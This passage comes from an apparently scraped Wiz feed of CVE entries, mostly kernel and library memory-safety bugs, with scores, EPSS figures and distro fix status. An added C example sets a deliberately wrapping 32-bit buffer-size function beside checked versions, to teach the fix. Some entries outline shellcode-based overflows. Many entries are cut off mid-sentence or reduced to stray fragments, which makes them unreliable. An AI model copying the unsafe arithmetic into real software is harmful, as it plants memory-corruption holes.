CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libchdr
libsdl2-mixer
Sources
NVD
Debian 11, 12 Severity LOW No Fix
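The gdk-pixbuf entry (CVE-2026-5201, an unvalidated JPEG color component count) and the dr_flac entry above (CVE-2025-14369, a trusted totalPCMFrameCount driving a buffer size) are the same defect class seen from two formats: a header field is used in size arithmetic before it is checked against what the format actually permits. As an added example serving both entries (not gdk-pixbuf or dr_flac code; function names are assumptions, the legal ranges are the formats' own), this C block validates each field against its domain, shows the 32-bit product wrapping to a small value, and replaces it with overflow-checked arithmetic.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>

/* Added example, not gdk-pixbuf or dr_flac code. */

/* JPEG loader: the component count comes from the SOF header. Only 1
 * (grayscale), 3 (YCbCr/RGB) and 4 (CMYK/YCCK) are meaningful; any other
 * value is rejected before it can size a row buffer. */
int jpeg_row_stride(uint32_t width, uint32_t components, size_t *stride)
{
	size_t s;

	if (components != 1 && components != 3 && components != 4)
		return -EINVAL;
	if (width == 0 || width > 65535)       /* SOF width is a 16-bit field */
		return -EINVAL;
	if (__builtin_mul_overflow((size_t)width, (size_t)components, &s))
		return -EOVERFLOW;
	*stride = s;
	return 0;
}

/* FLAC decoder, the unsafe shape: the frame count is narrowed and the
 * product is computed in 32 bits, so a large count wraps to a small
 * buffer that later writes overrun. */
uint32_t flac_pcm_bytes_naive32(uint64_t total_frames, uint32_t channels,
				uint32_t bytes_per_sample)
{
	uint32_t frames32 = (uint32_t)total_frames;       /* silent truncation */
	return frames32 * channels * bytes_per_sample;    /* wraps mod 2^32 */
}

/* Checked version: validate each STREAMINFO field against what FLAC
 * allows, multiply with overflow detection, and fail instead of
 * returning a wrapped size. */
int flac_pcm_bytes_checked(uint64_t total_frames, uint32_t channels,
			   uint32_t bits_per_sample, uint64_t *bytes)
{
	uint64_t per_frame, total;

	if (channels < 1 || channels > 8)              /* FLAC: 1..8 channels */
		return -EINVAL;
	if (bits_per_sample < 4 || bits_per_sample > 32)
		return -EINVAL;
	if (total_frames >= ((uint64_t)1 << 36))      /* field is 36 bits wide */
		return -EINVAL;
	per_frame = (uint64_t)channels * ((bits_per_sample + 7) / 8);
	if (__builtin_mul_overflow(total_frames, per_frame, &total))
		return -EOVERFLOW;
	*bytes = total;
	return 0;
}

/* Wrappers for the checks: the accepted size, or 0 on rejection. */
size_t jpeg_stride_or_zero(uint32_t width, uint32_t components)
{
	size_t s = 0;

	return jpeg_row_stride(width, components, &s) == 0 ? s : 0;
}

uint64_t flac_bytes_or_zero(uint64_t frames, uint32_t ch, uint32_t bps)
{
	uint64_t b = 0;

	return flac_pcm_bytes_checked(frames, ch, bps, &b) == 0 ? b : 0;
}
```

Checked arithmetic alone still accepts a legal 36-bit frame count with eight 32-bit channels, a request of about 2 TiB; the complementary control is an absolute cap on the result, which is the approach the drm/amdgpu entry earlier on this page takes for its entry count.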
## CVE-2025-68763 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 5.3, severity MEDIUM
In the Linux kernel, the following vulnerability has been resolved:
crypto: starfive - Correctly handle return of sg_nents_for_len
The return value of sg_nents_for_len was assigned to an unsigned long
in starfive_hash_digest, causing negative error codes to be converted
to large positive integers.
Add error checking for sg_nents_for_len and return immediately on
failure to prevent potential buffer overflows.
Source : NVD
Published January 5, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.5
Exploitation Probability (EPSS) N/A
Affected packages and
## CVE-2026-23132 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 5.5, severity MEDIUM
In the Linux kernel, the following vulnerability has been resolved:
drm/bridge: synopsys: dw-dp: fix error paths of dw_dp_bind
Fix several issues in dw_dp_bind() error handling:
Missing return after drm_bridge_attach() failure - the function
continued execution instead of returning an error.
Resource leak: drm_dp_aux_register() is not a devm function, so
drm_dp_aux_unregister() must be called on all error paths after
aux registration succeeds. This affects errors from:
drm_bridge_attach()
phy_init()
devm_add_action_or_reset()
platform_get_irq()
devm_request_threaded_irq()
Bug fix: platform_get_irq() returns the IRQ number or a negative
error code, but the error path was returning ERR_PTR(ret) instead
of ERR_
## CVE-2025-33219 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 7.8, severity HIGH
NVIDIA Display Driver for Linux contains a vulnerability in the NVIDIA kernel module where an attacker could cause an integer overflow or wraparound. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, or information disclosure.
Source : NVD
Score 7.8
Published January 28, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nvidia-graphics-drivers-535
nvidia-graphics-drivers
Sourc
## CVE-2025-11266 :
Linux Debian vulnerability analysis and mitigation
Wiz rating: CVSS 6.8, severity MEDIUM
An out-of-bounds write vulnerability exists in the Grassroots DICOM library (GDCM). The issue is triggered during parsing of a malformed DICOM file containing encapsulated PixelData fragments (compressed image data stored as multiple fragments). This vulnerability leads to a segmentation fault caused by an out-of-bounds memory access due to unsigned integer underflow in buffer indexing. It is exploitable via file input; simply opening a crafted malicious DICOM file is sufficient to trigger the crash, resulting in a denial-of-service condition.
Source : NVD
Score 6.8
Published December 12, 2025
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Explo
Wiz (blogs_wiz) · CVSS 3.7
CVE-2026-3184 [LOW] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3184 :
Linux Debian vulnerability analysis and mitigation
login(1)
-h
PAM_RHOST
Source : NVD
Score 3.7
Published April 3, 2026
Severity LOW
CNA Score 3.7
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
libmount-devel
libuuid-devel-32bit
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Mar 02, 2026
Debian 14 Severity LOW No Fix Added at: Mar 02, 2026
Echo Severity LOW Has Fix Added at: Mar 02, 2026
Ubuntu 25.10 Severity MEDIUM No Fix Added at: Mar 08, 2026
Wiz (blogs_wiz) · CVSS 5.3
CVE-2025-61654 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-61654 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation Thanks. This vulnerability is associated with program files includes/ThanksQueryHelper.Php.
This issue affects Thanks: from * before 1.43.4, 1.44.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mediawiki
Sources
NVD
Debian 13, 14 Has Fix Added at: Oct 05, 2025
Wiz (blogs_wiz) · CVSS 5.3
CVE-2026-3884 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3884 :
Linux Debian vulnerability analysis and mitigation
Versions of the package spin.js before 3.0.0 are vulnerable to Cross-site Scripting (XSS) via the spin() function, which allows the creation of more than one alert for each 'target' element. An attacker would first need to set an arbitrary key-value pair on Object.prototype through a crafted URL (achieving prototype pollution) before being able to execute arbitrary JavaScript in the context of the user's browser.
Source : NVD
Score 2
Published March 11, 2026
Severity LOW
CNA Score 2.0
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9
Exploitation Probability (EPSS) N/A
Affecte
Wiz (blogs_wiz) · CVSS 5.3
CVE-2026-23328 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23328 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: Fix NULL pointer dereference of mgmt_chann
mgmt_chann may be set to NULL if the firmware returns an unexpected
error in aie2_send_mgmt_msg_wait(). This can later lead to a NULL
pointer dereference in aie2_hw_stop().
Fix this by introducing a dedicated helper to destroy mgmt_chann
and by adding proper NULL checks before accessing it.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.5
Exploitation Probability (EPSS) N/A
Affected package
Wiz (blogs_wiz) · CVSS 4.7
CVE-2025-15581 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-15581 :
Linux Debian vulnerability analysis and mitigation
Orthanc versions before 1.12.10 are affected by an authorisation logic flaw in the application's HTTP Basic Authentication implementation.
Successful exploitation could result in Privilege Escalation, potentially allowing full administrative access.
Source : NVD
Score 4.7
Published February 18, 2026
Severity MEDIUM
CNA Score 4.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
orthanc
Sources
NVD
Debian 11, 14 Has Fix Added at: Feb 20, 2026
Debian 12, 13 No Fix Added at: Feb 20, 2026
Echo No F
Wiz (blogs_wiz) · CVSS 5.3
CVE-2023-54059 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54059 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
soc: mediatek: mtk-svs: Enable the IRQ later
If the system does not come from reset (like when it is booted via
kexec()), the peripheral might trigger an IRQ before the data structures
are initialised.
[ 0.227710] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000f08
[ 0.227913] Call trace:
[ 0.227918] svs_isr+0x8c/0x538
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected pack
Wiz (blogs_wiz) · CVSS 5.3
CVE-2026-5107 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5107 :
Linux Debian vulnerability analysis and mitigation
A vulnerability has been found in FRRouting FRR up to 10.5.1. This affects the function process_type2_route of the file bgpd/bgp_evpn.c of the component EVPN Type-2 Route Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The attack is considered to have high complexity. The exploitability is reported as difficult. The identifier of the patch is 7676cad65114aa23adde583d91d9d29e2debd045. To fix this issue, it is recommended to deploy a patch.
Source : NVD
Score 2.3
Published March 30, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/
Wiz (blogs_wiz) · CVSS 7.5
CVE-2026-2474 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2474 :
Linux Debian vulnerability analysis and mitigation
Crypt::URandom versions from 0.41 before 0.55 for Perl are vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().
The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) is supplied, the expression length + 1u causes an integer wraparound, resulting in a zero-byte allocation. The subsequent call to getrandom(data, length, GRND_NONBLOCK) passes the original negative value, which is implicitly converted to a large unsigned value (typically SIZE_MAX). This can result in writes beyond the allocated buffer, leading to heap memory corruption and application crash (denial of service).
In common usage, the length argument is typically hardcoded by the
Wiz (blogs_wiz) · CVSS 7.2
CVE-2025-62799 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-62799 :
Linux Debian vulnerability analysis and mitigation
fragmentSize
sampleSize
Source : NVD
Score 7.2
Published February 3, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fastdds
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Nov 19, 2025
Debian 14 Severity CRITICAL No Fix Added at: Nov 19, 2025
Echo Severity CRITICAL No Fix Added at: Nov 19, 2025
Wiz (blogs_wiz) · CVSS 5.3
CVE-2026-2708 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2708 :
Linux Debian vulnerability analysis and mitigation
[libsoup: HTTP/1 request smuggling primitives accepted (CL.CL and TE+CL) in soup_headers_parse()]
Source : NVD
Published February 23, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libsoup-devel
libsoup-lang
Sources
NVD
Debian 11, 14 No Fix Added at: Feb 20, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Feb 20, 2026
Echo No Fix Added at: Feb 20, 2026
Red Hat 6, 7, 8, 9, 10 Severity LOW No Fix Added at: Feb 20, 2026
Red Hat 7 Has Fix Added at: Feb 21, 2026
Wiz (blogs_wiz)
CVE-2025-68781 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68781 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
usb: phy: fsl-usb: Fix use-after-free in delayed work during device removal
The delayed work item otg_event is initialized in fsl_otg_conf() and
scheduled under two conditions:
When a host controller binds to the OTG controller.
When the USB ID pin state changes (cable insertion/removal).
A race condition occurs when the device is removed via fsl_otg_remove():
the fsl_otg instance may be freed while the delayed work is still pending
or executing. This leads to use-after-free when the work function
fsl_otg_event() accesses the already freed memory.
The problematic scenario:
(detach thread) | (delayed work)
fsl_otg_remove() |
kfree(fsl_otg_dev) /
Wiz (blogs_wiz)
CVE-2023-54151 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54151 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: Fix system crash due to lack of free space in LFS
When f2fs tries to checkpoint during foreground gc in LFS mode, system
crash occurs due to lack of free space if the amount of dirty node and
dentry pages generated by data migration exceeds free space.
The reproduction sequence is as follows.
20GiB capacity block device (null_blk)
format and mount with LFS mode
create a file and write 20,000MiB
4k random write on full range of the file
RIP: 0010:new_curseg+0x48a/0x510 [f2fs]
Code: 55 e7 f5 89 c0 48 0f af c3 48 8b 5d c0 48 c1 e8 20 83 c0 01 89 43 6c 48 83 c4 28 5b 41 5c 41 5d 41 5e 41 5f 5d c3 cc cc cc cc 0b f0 41 80 4f 48 04 45 85 f6 0f 8
Wiz (blogs_wiz) · CVSS 8.6
CVE-2016-20037 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2016-20037 :
Echo vulnerability analysis and mitigation
xwpe 1.5.30a-2.1 and prior contains a stack-based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying overly long input strings that exceed buffer boundaries. Attackers can craft malicious command-line arguments with 262 bytes of junk data followed by shellcode to overwrite the instruction pointer and achieve code execution or denial of service.
Source : NVD
Score 8.6
Published March 28, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
xwpe
So
Wiz (blogs_wiz) · CVSS 5.3
CVE-2023-54162 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54162 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix possible memory leak in smb2_lock()
argv needs to be freed when setup_async_work fails or when the current
process is woken up.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-xilinx-zynqmp
linux-azure-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 31, 2025
Echo Has Fix Added at: Dec 31, 2025
Ubuntu 16.04, 18.04 Severity MEDIUM No Fix Added at:
Wiz (blogs_wiz) · CVSS 5.3
CVE-2025-68203 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68203 :
Linux Debian vulnerability analysis and mitigation
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Source : NVD
Score 5.5
Published December 16, 2025
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-gcp-fips
linux-hwe-6.8
Sources
NVD
Debian 11, 12, 13 No Fix Added at: Dec 17, 2025
Debian 14 Has Fix Added at: Dec 17, 2025
Echo Has Fix Added at: Dec 17, 2025
Ubuntu 16.04, 18.04, 20.04, 22.04, 24.04, 25.10 Severity MEDIUM No Fix Added at: Dec 18, 2025
Wiz (blogs_wiz) · CVSS 9.8
CVE-2025-66043 [CRITICAL] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66043 :
Linux Debian vulnerability analysis and mitigation
Several stack-based buffer overflow vulnerabilities exist in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities. When Tag is 3
Source : NVD
Score 9.8
Published December 11, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 12, 20
Wiz (blogs_wiz) · CVSS 4.6
CVE-2025-29943 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-29943 :
Linux Debian vulnerability analysis and mitigation
A write-what-where condition within AMD CPUs may allow an admin-privileged attacker to modify the configuration of the CPU pipeline, potentially resulting in the corruption of the stack pointer inside an SEV-SNP guest.
Source : NVD
Score 4.6
Published January 16, 2026
Severity MEDIUM
CNA Score 4.6
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
amd64-microcode
Sources
NVD
Debian 11 No Fix Added at: Jan 20, 2026
Echo No Fix Added at: Jan 20, 2026
Ubuntu 16.04, 18.04, 20.04, 22.04, 24.04, 25.
Wiz (blogs_wiz) · CVSS 5.3
CVE-2025-67484 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67484 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/Api/ApiFormatXml.Php.
This issue affects MediaWiki: from * before 1.39.16, 1.43.6, 1.44.3, 1.45.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 12, 2025
Echo Has Fix Added at: Dec 12, 2025
Wiz (blogs_wiz) · CVSS 9.8
CVE-2025-66045 [CRITICAL] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66045 :
Linux Debian vulnerability analysis and mitigation
Several stack-based buffer overflow vulnerabilities exist in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities. When Tag is 65
Source : NVD
Score 9.8
Published December 11, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 12, 2
Wiz (blogs_wiz) · CVSS 5.3
CVE-2023-54228 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54228 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
regulator: raa215300: Fix resource leak in case of error
The clk_register_clkdev() allocates memory by calling vclkdev_alloc() and
this memory is not freed in the error path. Similarly, resources allocated
by clk_register_fixed_rate() are not freed in the error path.
Fix these issues by using devm_clk_hw_register_fixed_rate() and
devm_clk_hw_register_clkdev().
After this, the static variable clk is not needed. Replace it with
local variable hw in probe() and drop calling clk_unregister_fixed_rate()
from raa215300_rtc_unregister_device().
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
H
Wiz (blogs_wiz) · CVSS 6.7
CVE-2020-37121 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2020-37121 :
Echo vulnerability analysis and mitigation
CODE::BLOCKS 16.01 contains a buffer overflow vulnerability that allows attackers to execute arbitrary code by overwriting Structured Exception Handler with crafted Unicode characters. Attackers can create a malicious M3U playlist file with 536 bytes of buffer and shellcode to trigger remote code execution.
Source : NVD
Score 6.7
Published February 5, 2026
Severity MEDIUM
CNA Score 6.7
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
codeblocks
Sources
NVD
Echo Severity MEDIUM No Fix Added at: Feb 08, 2026
Wiz (blogs_wiz) · CVSS 5.3
CVE-2026-23387 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23387 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
pinctrl: cirrus: cs42l43: Fix double-put in cs42l43_pin_probe()
devm_add_action_or_reset() already invokes the action on failure,
so the explicit put causes a double-put.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-6.8
linux-gkeop
Sources
NVD
Debian 13 No Fix Added at: Mar 26, 2026
Debian 14 Has Fix Added at: Mar 26, 2026
Ubuntu 22.04, 24.04, 25.10 Severity ME
Wiz (blogs_wiz) · CVSS 5.3
CVE-2025-68739 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68739 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
PM / devfreq: hisi: Fix potential UAF in OPP handling
Ensure all required data is acquired before calling dev_pm_opp_put(opp)
to maintain correct resource acquisition and release order.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-gcp-6.17
linux
Sources
NVD
Debian 14 Has Fix Added at: Dec 26, 2025
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Dec 26
Wiz (blogs_wiz) · CVSS 5.3
CVE-2022-50708 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50708 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
HSI: ssi_protocol: fix potential resource leak in ssip_pn_open()
ssip_pn_open() claims the HSI client's port with hsi_claim_port(). When
hsi_register_port_event() gets some error and returns a negative value,
the HSI client's port should be released with hsi_release_port().
Fix it by calling hsi_release_port() when hsi_register_port_event() fails.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected pack
Wiz (blogs_wiz) · CVSS 5.3
CVE-2025-68247 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68247 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
posix-timers: Plug potential memory leak in do_timer_create()
When posix timer creation is set to allocate a given timer ID and the
access to the user space value faults, the function terminates without
freeing the already allocated posix timer structure.
Move the allocation after the user space access to cure that.
[ tglx: Massaged change log ]
Source : NVD
Published December 16, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected packa
Wiz (blogs_wiz) · CVSS 8.6
CVE-2016-20048 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2016-20048 :
Echo vulnerability analysis and mitigation
iSelect 1.4.0-2+b1 contains a local buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying an oversized value to the -k/--key parameter. Attackers can craft a malicious argument containing a NOP sled, shellcode, and return address to overflow a 1024-byte stack buffer and gain code execution with user privileges.
Source : NVD
Score 8.6
Published March 28, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iselect
Sources
NVD
Echo Severity HIGH No Fi
Wiz (blogs_wiz) · CVSS 5.8
CVE-2026-33144 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33144 :
Linux Debian vulnerability analysis and mitigation
GPAC is an open-source multimedia framework. Prior to commit 86b0e36, a heap-based buffer overflow (write) vulnerability was discovered in GPAC MP4Box. The vulnerability exists in the gf_xml_parse_bit_sequence_bs function in utils/xml_bin_custom.c when processing a crafted NHML file containing malicious (BitSequence) elements. An attacker can exploit this by providing a specially crafted NHML file, causing an out-of-bounds write on the heap. This issue has been fixed via commit 86b0e36.
Source : NVD
Score 5.8
Published March 20, 2026
Severity MEDIUM
CNA Score 5.8
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Pro
Wiz (blogs_wiz) · CVSS 4.8
CVE-2025-54514 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-54514 :
Linux Debian vulnerability analysis and mitigation
Improper isolation of shared resources on a system on a chip by a malicious local attacker with high privileges could potentially lead to a partial loss of integrity.
Source : NVD
Score 4.8
Published February 10, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Amazon Linux
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iwl7260-firmware
libertas-sd8787-firmware
Sources
NVD
Debian 11 No Fix Added at: Feb 11, 2026
Echo No Fix Added at: Feb 11, 2026
Wiz (blogs_wiz) · CVSS 5.3
CVE-2025-68246 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68246 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: close accepted socket when per-IP limit rejects connection
When the per-IP connection limit is exceeded in ksmbd_kthread_fn(),
the code sets ret = -EAGAIN and continues the accept loop without
closing the just-accepted socket. That leaks one socket per rejected
attempt from a single IP and enables a trivial remote DoS.
Release client_sk before continuing.
This bug was found with ZeroPath.
Source : NVD
Published December 16, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.6
Wiz (blogs_wiz)
CVE-2025-68189 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68189 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/msm: Fix GEM free for imported dma-bufs
